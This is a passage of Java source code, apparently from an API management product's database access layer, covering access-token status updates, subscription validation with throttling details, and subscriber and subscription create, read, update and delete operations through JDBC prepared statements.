SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return apiKeyInfoDTOs; } /** * This method is to update the access token * * @param userId id of the user * @param apiInfoDTO Api info * @param statusEnum Status of the access key * @throws APIManagementException if failed to update the access token */ public void changeAccessTokenStatus(String userId, APIInfoDTO apiInfoDTO, String statusEnum) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; String tenantAwareUsername = MultitenantUtils.getTenantAwareUsername(userId); int tenantId = APIUtil.getTenantId(userId); String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableNameOfUserId(userId, accessTokenStoreTable); String sqlQuery = SQLConstants.CHANGE_ACCESS_TOKEN_STATUS_PREFIX + accessTokenStoreTable + SQLConstants.CHANGE_ACCESS_TOKEN_STATUS_DEFAULT_SUFFIX; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.CHANGE_ACCESS_TOKEN_STATUS_PREFIX + accessTokenStoreTable + SQLConstants.CHANGE_ACCESS_TOKEN_STATUS_CASE_INSENSITIVE_SUFFIX; } try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); ps = conn.prepareStatement(sqlQuery); ps.setString(1, statusEnum); ps.setString(2, tenantAwareUsername); ps.setInt(3, tenantId); ps.setString(4, APIUtil.replaceEmailDomainBack(apiInfoDTO.getProviderId())); ps.setString(5, apiInfoDTO.getApiName()); ps.setString(6, apiInfoDTO.getVersion()); int count = ps.executeUpdate(); if (log.isDebugEnabled()) { log.debug("Number of rows being updated : " + count); } conn.commit(); } catch (SQLException e) { try { if (conn != null) { conn.rollback(); } } catch (SQLException e1) { log.error("Failed to rollback the changeAccessTokenStatus operation", e1); } handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public boolean validateSubscriptionDetails(String context, String version, String consumerKey, APIKeyValidationInfoDTO infoDTO) throws APIManagementException { boolean defaultVersionInvoked = false; String apiTenantDomain = MultitenantUtils.getTenantDomainFromRequestURL(context); if (apiTenantDomain == null) { apiTenantDomain = MultitenantConstants.SUPER_TENANT_DOMAIN_NAME; } int apiOwnerTenantId = APIUtil.getTenantIdFromTenantDomain(apiTenantDomain); //Check if the api version has been prefixed with _default_ if (version != null && version.startsWith(APIConstants.DEFAULT_VERSION_PREFIX)) { defaultVersionInvoked = true; //Remove the prefix from the version. 
version = version.split(APIConstants.DEFAULT_VERSION_PREFIX)[1]; } String sql; boolean isAdvancedThrottleEnabled = APIUtil.isAdvanceThrottlingEnabled(); if (!isAdvancedThrottleEnabled) { if (defaultVersionInvoked) { sql = SQLConstants.VALIDATE_SUBSCRIPTION_KEY_DEFAULT_SQL; } else { sql = SQLConstants.VALIDATE_SUBSCRIPTION_KEY_VERSION_SQL; } } else { if (defaultVersionInvoked) { sql = SQLConstants.ADVANCED_VALIDATE_SUBSCRIPTION_KEY_DEFAULT_SQL; } else { sql = SQLConstants.ADVANCED_VALIDATE_SUBSCRIPTION_KEY_VERSION_SQL; } } Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(true); ps = conn.prepareStatement(sql); ps.setString(1, context); ps.setString(2, consumerKey); if (!isAdvancedThrottleEnabled) { if (!defaultVersionInvoked) { ps.setString(3, version); } } else { ps.setInt(3, apiOwnerTenantId); if (!defaultVersionInvoked) { ps.setString(4, version); } } rs = ps.executeQuery(); if (rs.next()) { String subscriptionStatus = rs.getString("SUB_STATUS"); String type = rs.getString("KEY_TYPE"); if (APIConstants.SubscriptionStatus.BLOCKED.equals(subscriptionStatus)) { infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.API_BLOCKED); infoDTO.setAuthorized(false); return false; } else if (APIConstants.SubscriptionStatus.ON_HOLD.equals(subscriptionStatus) || APIConstants .SubscriptionStatus.REJECTED.equals(subscriptionStatus)) { infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.SUBSCRIPTION_INACTIVE); infoDTO.setAuthorized(false); return false; } else if (APIConstants.SubscriptionStatus.PROD_ONLY_BLOCKED.equals(subscriptionStatus) && !APIConstants.API_KEY_TYPE_SANDBOX.equals(type)) { infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.API_BLOCKED); infoDTO.setType(type); infoDTO.setAuthorized(false); return false; } String tokenType = rs.getString("TOKEN_TYPE"); if (APIConstants.JWT.equals(tokenType)) { infoDTO.setAuthorized(false); return false; } String apiProvider = rs.getString("API_PROVIDER"); String subTier = rs.getString("TIER_ID"); String appTier = rs.getString("APPLICATION_TIER"); infoDTO.setTier(subTier); infoDTO.setSubscriber(rs.getString("USER_ID")); infoDTO.setApplicationId(rs.getString("APPLICATION_ID")); infoDTO.setApiName(rs.getString("API_NAME")); infoDTO.setApiPublisher(apiProvider); infoDTO.setApplicationName(rs.getString("NAME")); infoDTO.setApplicationTier(appTier); infoDTO.setType(type); //Advanced Level Throttling Related Properties if (APIUtil.isAdvanceThrottlingEnabled()) { String apiTier = rs.getString("API_TIER"); String subscriberUserId = rs.getString("USER_ID"); String subscriberTenant = MultitenantUtils.getTenantDomain(subscriberUserId); int apiId = rs.getInt("API_ID"); int subscriberTenantId = APIUtil.getTenantId(subscriberUserId); int apiTenantId = APIUtil.getTenantId(apiProvider); //TODO isContentAware boolean isContentAware = isAnyPolicyContentAware(conn, apiTier, appTier, subTier, subscriberTenantId, apiTenantId, apiId); infoDTO.setContentAware(isContentAware); //TODO this must implement as a part of throttling implementation. 
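// The statements below copy the spike-arrest limit/unit and the stop-on-quota-reach flag into the key validation DTO, record the subscriber tenant and API tier, and seed the throttling data list with the API-level throttling key.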
int spikeArrest = 0; String apiLevelThrottlingKey = "api_level_throttling_key"; if (rs.getInt("RATE_LIMIT_COUNT") > 0) { spikeArrest = rs.getInt("RATE_LIMIT_COUNT"); } String spikeArrestUnit = null; if (rs.getString("RATE_LIMIT_TIME_UNIT") != null) { spikeArrestUnit = rs.getString("RATE_LIMIT_TIME_UNIT"); } boolean stopOnQuotaReach = rs.getBoolean("STOP_ON_QUOTA_REACH"); List<String> list = new ArrayList<String>(); list.add(apiLevelThrottlingKey); infoDTO.setSpikeArrestLimit(spikeArrest); infoDTO.setSpikeArrestUnit(spikeArrestUnit); infoDTO.setStopOnQuotaReach(stopOnQuotaReach); infoDTO.setSubscriberTenantDomain(subscriberTenant); if (apiTier != null && apiTier.trim().length() > 0) { infoDTO.setApiTier(apiTier); } //We also need to set throttling data list associated with given API. This need to have policy id and // condition id list for all throttling tiers associated with this API. infoDTO.setThrottlingDataList(list); } return true; } infoDTO.setAuthorized(false); infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.API_AUTH_RESOURCE_FORBIDDEN); } catch (SQLException e) { handleException("Exception occurred while validating Subscription.", e); } finally { try { conn.setAutoCommit(false); } catch (SQLException e) { } APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return false; } private boolean isAnyPolicyContentAware(Connection conn, String apiPolicy, String appPolicy, String subPolicy, int subscriptionTenantId, int appTenantId, int apiId) throws APIManagementException { boolean isAnyContentAware = false; // only check if using CEP based throttling. ResultSet resultSet = null; PreparedStatement ps = null; String sqlQuery = SQLConstants.ThrottleSQLConstants.IS_ANY_POLICY_CONTENT_AWARE_SQL; try { String dbProdName = conn.getMetaData().getDatabaseProductName(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, apiPolicy); ps.setInt(2, subscriptionTenantId); ps.setString(3, apiPolicy); ps.setInt(4, subscriptionTenantId); ps.setInt(5, apiId); ps.setInt(6, subscriptionTenantId); ps.setInt(7, apiId); ps.setInt(8, subscriptionTenantId); ps.setString(9, subPolicy); ps.setInt(10, subscriptionTenantId); ps.setString(11, appPolicy); ps.setInt(12, appTenantId); resultSet = ps.executeQuery(); // We only expect one result if all are not content aware. 
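// A single row is expected here; a count greater than zero means at least one of the API, subscription or application level policies is content (bandwidth) aware.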
if (resultSet == null) { throw new APIManagementException(" Result set Null"); } int count = 0; if (resultSet.next()) { count = resultSet.getInt(1); if (count > 0) { isAnyContentAware = true; } } } catch (SQLException e) { handleException("Failed to get content awareness of the policies ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, resultSet); } return isAnyContentAware; } public void addSubscriber(Subscriber subscriber, String groupingId) throws APIManagementException { Connection conn = null; ResultSet rs = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String query = SQLConstants.ADD_SUBSCRIBER_SQL; ps = conn.prepareStatement(query, new String[]{"subscriber_id"}); ps.setString(1, subscriber.getName()); ps.setInt(2, subscriber.getTenantId()); ps.setString(3, subscriber.getEmail()); Timestamp timestamp = new Timestamp(subscriber.getSubscribedDate().getTime()); ps.setTimestamp(4, timestamp); ps.setString(5, subscriber.getName()); ps.setTimestamp(6, timestamp); ps.setTimestamp(7, timestamp); ps.executeUpdate(); int subscriberId = 0; rs = ps.getGeneratedKeys(); if (rs.next()) { subscriberId = Integer.parseInt(rs.getString(1)); } subscriber.setId(subscriberId); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Error while rolling back the failed operation", e1); } } handleException("Error in adding new subscriber: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } } public void updateSubscriber(Subscriber subscriber) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String query = SQLConstants.UPDATE_SUBSCRIBER_SQL; ps = conn.prepareStatement(query); ps.setString(1, subscriber.getName()); ps.setInt(2, subscriber.getTenantId()); ps.setString(3, subscriber.getEmail()); ps.setTimestamp(4, new Timestamp(subscriber.getSubscribedDate().getTime())); ps.setString(5, subscriber.getName()); ps.setTimestamp(6, new Timestamp(System.currentTimeMillis())); ps.setInt(7, subscriber.getId()); ps.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Error while rolling back the failed operation", e1); } } handleException("Error in updating subscriber: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public Subscriber getSubscriber(int subscriberId) throws APIManagementException { Connection conn = null; ResultSet rs = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_SUBSCRIBER_SQL; ps = conn.prepareStatement(query); ps.setInt(1, subscriberId); rs = ps.executeQuery(); if (rs.next()) { Subscriber subscriber = new Subscriber(rs.getString("USER_ID")); subscriber.setId(subscriberId); subscriber.setTenantId(rs.getInt("TENANT_ID")); subscriber.setEmail(rs.getString("EMAIL_ADDRESS")); subscriber.setSubscribedDate(new java.util.Date(rs.getTimestamp("DATE_SUBSCRIBED").getTime())); return subscriber; } } catch (SQLException e) { handleException("Error while retrieving subscriber: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return null; } public int addSubscription(APIIdentifier identifier, String context, int applicationId, String status, String subscriber) throws APIManagementException { Connection conn = null; 
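// JDBC handles declared below are released in the finally block; the duplicate-subscription check and the insert run in a single transaction (autocommit is turned off and committed at the end).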
ResultSet resultSet = null; PreparedStatement ps = null; PreparedStatement preparedStForInsert = null; ResultSet rs = null; int subscriptionId = -1; int apiId; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); apiId = getAPIID(identifier, conn); //Query to check if this subscription already exists String checkDuplicateQuery = SQLConstants.CHECK_EXISTING_SUBSCRIPTION_API_SQL; ps = conn.prepareStatement(checkDuplicateQuery); ps.setInt(1, apiId); ps.setInt(2, applicationId); resultSet = ps.executeQuery(); //If the subscription already exists if (resultSet.next()) { String subStatus = resultSet.getString("SUB_STATUS"); String subCreationStatus = resultSet.getString("SUBS_CREATE_STATE"); String applicationName = getApplicationNameFromId(applicationId); if ((APIConstants.SubscriptionStatus.UNBLOCKED.equals(subStatus) || APIConstants.SubscriptionStatus.ON_HOLD.equals(subStatus) || APIConstants.SubscriptionStatus.REJECTED.equals(subStatus)) && APIConstants.SubscriptionCreatedStatus.SUBSCRIBE.equals(subCreationStatus)) { //Throw error saying subscription already exists. log.error("Subscription already exists for API " + identifier.getApiName() + " in Application " + applicationName); throw new SubscriptionAlreadyExistingException("Subscription already exists for API " + identifier.getApiName() + " in Application " + applicationName); } else if (APIConstants.SubscriptionStatus.UNBLOCKED.equals(subStatus) && APIConstants .SubscriptionCreatedStatus.UN_SUBSCRIBE.equals(subCreationStatus)) { deleteSubscriptionByApiIDAndAppID(apiId, applicationId, conn); } else if (APIConstants.SubscriptionStatus.BLOCKED.equals(subStatus) || APIConstants .SubscriptionStatus.PROD_ONLY_BLOCKED.equals(subStatus)) { log.error("Subscription to API " + identifier.getApiName() + " through application " + applicationName + " was blocked"); throw new APIManagementException("Subscription to API " + identifier.getApiName() + " through " + "application " + applicationName + " was blocked"); } } //This query to update the AM_SUBSCRIPTION table String sqlQuery = SQLConstants.ADD_SUBSCRIPTION_SQL; //Adding data to the AM_SUBSCRIPTION table //ps = conn.prepareStatement(sqlQuery, Statement.RETURN_GENERATED_KEYS); preparedStForInsert = conn.prepareStatement(sqlQuery, new String[]{"SUBSCRIPTION_ID"}); if (conn.getMetaData().getDriverName().contains("PostgreSQL")) { preparedStForInsert = conn.prepareStatement(sqlQuery, new String[]{"subscription_id"}); } preparedStForInsert.setString(1, identifier.getTier()); preparedStForInsert.setInt(2, apiId); preparedStForInsert.setInt(3, applicationId); preparedStForInsert.setString(4, status != null ? 
status : APIConstants.SubscriptionStatus.UNBLOCKED); preparedStForInsert.setString(5, APIConstants.SubscriptionCreatedStatus.SUBSCRIBE); preparedStForInsert.setString(6, subscriber); Timestamp timestamp = new Timestamp(System.currentTimeMillis()); preparedStForInsert.setTimestamp(7, timestamp); preparedStForInsert.setTimestamp(8, timestamp); preparedStForInsert.setString(9, UUID.randomUUID().toString()); preparedStForInsert.executeUpdate(); rs = preparedStForInsert.getGeneratedKeys(); while (rs.next()) { //subscriptionId = rs.getInt(1); subscriptionId = Integer.parseInt(rs.getString(1)); } // finally commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add subscription ", e1); } } handleException("Failed to add subscriber data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); APIMgtDBUtil.closeAllConnections(preparedStForInsert, null, rs); } return subscriptionId; } public int addSubscription(APIProductIdentifier identifier, int applicationId, String status, String subscriber) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; PreparedStatement preparedStForInsert = null; ResultSet rs = null; int subscriptionId = -1; int apiProductId; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String productName = identifier.getApiProductName(); String provider = identifier.getProviderName(); apiProductId = getAPIProductID(productName, provider, conn); // Query to check if this subscription already exists String checkDuplicateQuery = SQLConstants.CHECK_EXISTING_SUBSCRIPTION_PRODUCT_SQL; ps = conn.prepareStatement(checkDuplicateQuery); ps.setInt(1, apiProductId); ps.setInt(2, applicationId); resultSet = ps.executeQuery(); // If the subscription already exists if (resultSet.next()) { String subStatus = resultSet.getString("SUB_STATUS"); String subCreationStatus = resultSet.getString("SUBS_CREATE_STATE"); String applicationName = getApplicationNameFromId(applicationId); if ((APIConstants.SubscriptionStatus.UNBLOCKED.equals(subStatus) || APIConstants.SubscriptionStatus.ON_HOLD.equals(subStatus) || APIConstants.SubscriptionStatus.REJECTED.equals(subStatus)) && APIConstants.SubscriptionCreatedStatus.SUBSCRIBE.equals(subCreationStatus)) { // Throw error saying subscription already exists. 
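                // An existing UNBLOCKED, ON_HOLD or REJECTED entry in SUBSCRIBE state already covers this
                // product/application pair, so the duplicate request is rejected rather than silently ignored.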
log.error("Subscription already exists for API Product " + productName + " in Application " + applicationName); throw new SubscriptionAlreadyExistingException("Subscription already exists for API Product " + productName + " in Application " + applicationName); } else if (APIConstants.SubscriptionStatus.UNBLOCKED.equals(subStatus) && APIConstants.SubscriptionCreatedStatus.UN_SUBSCRIBE.equals(subCreationStatus)) { deleteSubscriptionByApiProductIDAndAppID(apiProductId, applicationId, conn); } else if (APIConstants.SubscriptionStatus.BLOCKED.equals(subStatus) || APIConstants.SubscriptionStatus.PROD_ONLY_BLOCKED.equals(subStatus)) { log.error("Subscription to API Product " + productName + " through application " + applicationName + " was blocked"); throw new APIManagementException("Subscription to API Product " + productName + " through " + "application " + applicationName + " was blocked"); } } // This query to update the AM_SUBSCRIPTION table String sqlQuery = SQLConstants.ADD_PRODUCT_SUBSCRIPTION_SQL; // Adding data to the AM_SUBSCRIPTION table // ps = conn.prepareStatement(sqlQuery, Statement.RETURN_GENERATED_KEYS); preparedStForInsert = conn.prepareStatement(sqlQuery, new String[] { "SUBSCRIPTION_ID" }); if (conn.getMetaData().getDriverName().contains("PostgreSQL")) { preparedStForInsert = conn.prepareStatement(sqlQuery, new String[] { "subscription_id" }); } preparedStForInsert.setString(1, identifier.getTier()); preparedStForInsert.setInt(2, apiProductId); preparedStForInsert.setInt(3, applicationId); preparedStForInsert.setString(4, status != null ? status : APIConstants.SubscriptionStatus.UNBLOCKED); preparedStForInsert.setString(5, APIConstants.SubscriptionCreatedStatus.SUBSCRIBE); preparedStForInsert.setString(6, subscriber); Timestamp timestamp = new Timestamp(System.currentTimeMillis()); preparedStForInsert.setTimestamp(7, timestamp); preparedStForInsert.setTimestamp(8, timestamp); preparedStForInsert.setString(9, UUID.randomUUID().toString()); preparedStForInsert.executeUpdate(); rs = preparedStForInsert.getGeneratedKeys(); while (rs.next()) { // subscriptionId = rs.getInt(1); subscriptionId = Integer.parseInt(rs.getString(1)); } // finally commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add subscription ", e1); } } handleException("Failed to add subscriber data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); APIMgtDBUtil.closeAllConnections(preparedStForInsert, null, rs); } return subscriptionId; } /** * Removes the subscription entry from AM_SUBSCRIPTIONS for identifier. 
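     * The subscription row is located by looking up its UUID for the given API and application, after
     * which the actual removal is delegated to {@link #removeSubscription(SubscribedAPI, Connection)}.
     * <p>
     * Illustrative usage sketch (the identifier values and the {@code dao} handle are placeholders only):
     * <pre>
     *     APIIdentifier id = new APIIdentifier("admin", "SampleAPI", "1.0.0");
     *     dao.removeSubscription(id, applicationId);
     * </pre>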
     *
     * @param identifier    APIIdentifier
     * @param applicationId ID of the application which has the subscription
     * @throws APIManagementException
     */
    public void removeSubscription(APIIdentifier identifier, int applicationId) throws APIManagementException {
        Connection conn = null;
        ResultSet resultSet = null;
        PreparedStatement ps = null;
        int apiId = -1;
        String uuid;
        try {
            conn = APIMgtDBUtil.getConnection();
            conn.setAutoCommit(false);
            apiId = getAPIID(identifier, conn);
            String subscriptionUUIDQuery = SQLConstants.GET_SUBSCRIPTION_UUID_SQL;
            ps = conn.prepareStatement(subscriptionUUIDQuery);
            ps.setInt(1, apiId);
            ps.setInt(2, applicationId);
            resultSet = ps.executeQuery();
            if (resultSet.next()) {
                uuid = resultSet.getString("UUID");
                SubscribedAPI subscribedAPI = new SubscribedAPI(uuid);
                removeSubscription(subscribedAPI, conn);
            } else {
                throw new APIManagementException("UUID does not exist for the given apiId:" + apiId + " and " +
                        "application id:" + applicationId);
            }
            conn.commit();
        } catch (SQLException e) {
            if (conn != null) {
                try {
                    conn.rollback();
                } catch (SQLException ex) {
                    log.error("Failed to rollback the remove subscription ", ex);
                }
            }
            handleException("Failed to remove subscription data ", e);
        } finally {
            APIMgtDBUtil.closeAllConnections(ps, conn, resultSet);
        }
    }

    /**
     * Removes a subscription specified by SubscribedAPI object
     *
     * @param subscription SubscribedAPI object
     * @param conn         database connection object
     * @throws APIManagementException
     */
    public void removeSubscription(SubscribedAPI subscription, Connection conn) throws APIManagementException {
        ResultSet resultSet = null;
        PreparedStatement ps = null;
        PreparedStatement preparedStForUpdateOrDelete = null;
        String subStatus = null;
        try {
            String subscriptionStatusQuery = SQLConstants.GET_SUBSCRIPTION_STATUS_BY_UUID_SQL;
            ps = conn.prepareStatement(subscriptionStatusQuery);
            ps.setString(1, subscription.getUUID());
            resultSet = ps.executeQuery();
            if (resultSet.next()) {
                subStatus = resultSet.getString("SUB_STATUS");
            }
            // If the user was unblocked, remove the entry from DB, else change the status and keep the entry.
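            // BLOCKED and PROD_ONLY_BLOCKED subscriptions are retained (only updated) so the blocked state
            // is not lost; subscriptions in any other state are deleted outright.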
String updateQuery = SQLConstants.UPDATE_SUBSCRIPTION_SQL; String deleteQuery = SQLConstants.REMOVE_SUBSCRIPTION_SQL; if (APIConstants.SubscriptionStatus.BLOCKED.equals(subStatus) || APIConstants.SubscriptionStatus .PROD_ONLY_BLOCKED.equals(subStatus)) { preparedStForUpdateOrDelete = conn.prepareStatement(updateQuery); preparedStForUpdateOrDelete.setString(1, subscription.getUUID()); } else { preparedStForUpdateOrDelete = conn.prepareStatement(deleteQuery); preparedStForUpdateOrDelete.setString(1, subscription.getUUID()); } preparedStForUpdateOrDelete.executeUpdate(); } catch (SQLException e) { log.error("Failed to add subscriber data ", e); handleException("Failed to add subscriber data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, resultSet); APIMgtDBUtil.closeAllConnections(preparedStForUpdateOrDelete, null, null); } } /** * Removes a subscription by id by force without considering the subscription blocking state of the user * * @param subscription_id id of subscription * @throws APIManagementException */ public void removeSubscriptionById(int subscription_id) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String sqlQuery = SQLConstants.REMOVE_SUBSCRIPTION_BY_ID_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, subscription_id); ps.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback remove subscription ", e1); } } handleException("Failed to remove subscription data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public void removeAllSubscriptions(APIIdentifier apiIdentifier) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; int apiId; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); apiId = getAPIID(apiIdentifier, conn); String sqlQuery = SQLConstants.REMOVE_ALL_SUBSCRIPTIONS_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); ps.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback remove all subscription ", e1); } } handleException("Failed to remove all subscriptions data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public String getSubscriptionStatusById(int subscriptionId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String subscriptionStatus = null; try { conn = APIMgtDBUtil.getConnection(); String getApiQuery = SQLConstants.GET_SUBSCRIPTION_STATUS_BY_ID_SQL; ps = conn.prepareStatement(getApiQuery); ps.setInt(1, subscriptionId); resultSet = ps.executeQuery(); if (resultSet.next()) { subscriptionStatus = resultSet.getString("SUB_STATUS"); } return subscriptionStatus; } catch (SQLException e) { handleException("Failed to retrieve subscription status", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return null; } /** * returns the SubscribedAPI object which is related to the subscriptionId * * @param subscriptionId subscription id * @return {@link SubscribedAPI} Object which contains the subscribed API information. 
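     *         Both plain API and API Product subscriptions are handled; whichever identifier columns are
     *         populated in the result row decide the identifier type attached to the returned object.
     *         {@code null} is returned when no subscription exists for the given id.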
* @throws APIManagementException */ public SubscribedAPI getSubscriptionById(int subscriptionId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); String getSubscriptionQuery = SQLConstants.GET_SUBSCRIPTION_BY_ID_SQL; ps = conn.prepareStatement(getSubscriptionQuery); ps.setInt(1, subscriptionId); resultSet = ps.executeQuery(); SubscribedAPI subscribedAPI = null; if (resultSet.next()) { int applicationId = resultSet.getInt("APPLICATION_ID"); Application application = getApplicationById(applicationId); if(!StringUtils.isEmpty(resultSet.getString("API_NAME"))) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(resultSet.getString ("API_PROVIDER")), resultSet.getString("API_NAME"), resultSet.getString("API_VERSION")); subscribedAPI = new SubscribedAPI(application.getSubscriber(), apiIdentifier); } if(!StringUtils.isEmpty(resultSet.getString("API_PRODUCT_NAME"))) { APIProductIdentifier apiProductIdentifier = new APIProductIdentifier( APIUtil.replaceEmailDomain(resultSet.getString("API_PRODUCT_PROVIDER")), resultSet.getString("API_PRODUCT_NAME")); apiProductIdentifier.setUuid(resultSet.getString("PRODUCT_UUID")); subscribedAPI = new SubscribedAPI(application.getSubscriber(), apiProductIdentifier); } subscribedAPI.setSubscriptionId(resultSet.getInt("SUBSCRIPTION_ID")); subscribedAPI.setSubStatus(resultSet.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(resultSet.getString("SUBS_CREATE_STATE")); subscribedAPI.setTier(new Tier(resultSet.getString("TIER_ID"))); subscribedAPI.setUUID(resultSet.getString("UUID")); subscribedAPI.setApplication(application); } return subscribedAPI; } catch (SQLException e) { handleException("Failed to retrieve subscription from subscription id", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return null; } /** * returns the SubscribedAPI object which is related to the UUID * * @param uuid UUID of Application * @return {@link SubscribedAPI} Object which contains the subscribed API information. 
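     *         The lookup key is the subscription's own UUID. Created and updated timestamps are also
     *         populated; when the UPDATED_TIME column only holds the legacy '0000-00-00 00:00:00' default,
     *         the created time is reused instead.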
* @throws APIManagementException */ public SubscribedAPI getSubscriptionByUUID(String uuid) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); String getSubscriptionQuery = SQLConstants.GET_SUBSCRIPTION_BY_UUID_SQL; ps = conn.prepareStatement(getSubscriptionQuery); ps.setString(1, uuid); resultSet = ps.executeQuery(); SubscribedAPI subscribedAPI = null; if (resultSet.next()) { int applicationId = resultSet.getInt("APPLICATION_ID"); Application application = getApplicationById(applicationId); if(!StringUtils.isEmpty(resultSet.getString("API_NAME"))) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(resultSet.getString ("API_PROVIDER")), resultSet.getString("API_NAME"), resultSet.getString("API_VERSION")); subscribedAPI = new SubscribedAPI(application.getSubscriber(), apiIdentifier); } if(!StringUtils.isEmpty(resultSet.getString("API_PRODUCT_NAME"))) { APIProductIdentifier apiProductIdentifier = new APIProductIdentifier( APIUtil.replaceEmailDomain(resultSet.getString("API_PRODUCT_PROVIDER")), resultSet.getString("API_PRODUCT_NAME")); apiProductIdentifier.setUuid(resultSet.getString("PRODUCT_UUID")); subscribedAPI = new SubscribedAPI(application.getSubscriber(), apiProductIdentifier); } subscribedAPI.setUUID(resultSet.getString("UUID")); subscribedAPI.setSubscriptionId(resultSet.getInt("SUBSCRIPTION_ID")); subscribedAPI.setSubStatus(resultSet.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(resultSet.getString("SUBS_CREATE_STATE")); subscribedAPI.setTier(new Tier(resultSet.getString("TIER_ID"))); Timestamp createdTime = resultSet.getTimestamp("CREATED_TIME"); subscribedAPI.setCreatedTime(createdTime == null ? null : String.valueOf(createdTime.getTime())); try { Timestamp updated_time = resultSet.getTimestamp("UPDATED_TIME"); subscribedAPI.setUpdatedTime( updated_time == null ? null : String.valueOf(updated_time.getTime())); } catch (SQLException e) { // fixing Timestamp issue with default value '0000-00-00 00:00:00'for existing applications created subscribedAPI.setUpdatedTime(subscribedAPI.getCreatedTime()); } subscribedAPI.setApplication(application); } return subscribedAPI; } catch (SQLException e) { handleException("Failed to retrieve subscription from subscription id", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return null; } /** * This method used tot get Subscriber from subscriberId. 
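     * In other words, it resolves the Subscriber record for the given subscriber name within that user's
     * tenant, returning {@code null} when no matching subscriber exists.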
* * @param subscriberName id * @return Subscriber * @throws APIManagementException if failed to get Subscriber from subscriber id */ public Subscriber getSubscriber(String subscriberName) throws APIManagementException { Connection conn = null; Subscriber subscriber = null; PreparedStatement ps = null; ResultSet result = null; int tenantId = APIUtil.getTenantId(subscriberName); String sqlQuery = SQLConstants.GET_TENANT_SUBSCRIBER_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_TENANT_SUBSCRIBER_CASE_INSENSITIVE_SQL; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, subscriberName); ps.setInt(2, tenantId); result = ps.executeQuery(); if (result.next()) { subscriber = new Subscriber(result.getString(APIConstants.SUBSCRIBER_FIELD_EMAIL_ADDRESS)); subscriber.setEmail(result.getString("EMAIL_ADDRESS")); subscriber.setId(result.getInt("SUBSCRIBER_ID")); subscriber.setName(subscriberName); subscriber.setSubscribedDate(result.getDate(APIConstants.SUBSCRIBER_FIELD_DATE_SUBSCRIBED)); subscriber.setTenantId(result.getInt("TENANT_ID")); } } catch (SQLException e) { handleException("Failed to get Subscriber for :" + subscriberName, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, result); } return subscriber; } public Set<APIIdentifier> getAPIByConsumerKey(String accessToken) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String getAPISql = SQLConstants.GET_API_BY_CONSUMER_KEY_SQL; Set<APIIdentifier> apiSet = new HashSet<APIIdentifier>(); try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getAPISql); String encryptedAccessToken 